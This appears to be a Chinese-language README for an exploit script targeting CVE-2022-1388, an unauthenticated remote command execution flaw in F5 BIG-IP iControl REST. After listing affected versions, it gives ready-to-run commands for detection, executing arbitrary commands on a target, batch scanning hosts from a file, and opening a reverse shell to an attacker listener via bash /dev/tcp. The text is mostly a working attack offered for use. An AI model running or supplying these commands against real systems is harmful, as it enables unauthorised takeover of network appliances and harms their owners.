CVE-2022-1388:F5 BIG-IP iControl REST RCE

影响产品

• F5 BIG-IP 11.6.1 - 11.6.5
• F5 BIG-IP 12.1.0 - 12.1.6
• F5 BIG-IP 13.1.0 - 13.1.4
• F5 BIG-IP 14.1.0 - 14.1.4
• F5 BIG-IP 15.1.0 - 15.1.5
• F5 BIG-IP 16.1.0 - 16.1.2

漏洞影响

此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问，以执行任意系统命令、创建或删除文件或禁用服务

漏洞检测

检测脚本：https://github.com/Al1ex/CVE-2022-1388 

基本用法

python3 CVE_2022_1388.py

漏洞检测

python3 CVE_2022_1388.py -v true -u https://192.168.17.200

 

 命令执行

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

 批量检测

python3 CVE_2022_1388.py -s true -f check.txt

 反弹shell

python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"